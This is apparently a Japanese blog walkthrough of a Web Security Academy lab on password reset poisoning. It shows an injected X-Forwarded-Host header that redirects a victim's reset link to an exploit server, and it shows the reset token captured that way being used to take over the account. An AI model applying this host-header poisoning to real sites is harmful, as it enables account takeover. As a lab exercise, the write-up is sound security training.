Password reset poisoning via middlewareをやってみた

Hello there, ('ω')ノ

 

ミドルウェアを介したパスワードリセットポイズニングを。

 

このラボは、パスワードリセットポイズニングに対して脆弱で。

ラボを解決するには、Carlosのアカウントにログインすることで。

 

 

 

 

 

リンクをクリックして。

 

 

 

変更できる流れで。

 

 

まずは、リクエストをリピータへ。

 

 

はじめに下記のヘッダを追加してSendすると。

　X-Forwarded-Host: exp.com

 

 

メールのリンクのURLに反映されて。

 どうやらX-Forwarded-Host ヘッダがサポートされているようで。

 

 

次にエクスプロイトサーバのURLをコピーして。

 

 

エクスプロイトサーバのURLを指定してSendしても。

 

 

メールのURLに反映されるので。

 

 

ユーザをcarlosに変更してSendして。

 

 

ログからトークンを取得して。

　/forgot-password?temp-forgot-password-token=HIz1N8v9tJfknnN0rt2q2RyDaehc64Fe

 

 

さきほどのメールのリンクのURLに。

https://acad1f981e436214804a1e310097001f.web-security-academy.net/forgot-password?temp-forgot-password-token=xNDu8hbFuW8pCn0VmHPUG1NkNHYQSium

 

 

ログで取得したトークンを入れ替えてアクセスして。

パスワードを変更して。

https://acad1f981e436214804a1e310097001f.web-security-academy.net
/forgot-password?temp-forgot-password-token=HIz1N8v9tJfknnN0rt2q2RyDaehc64Fe

 

 

ログインするとクリアできた。

 

 

Best regards, (^^ゞ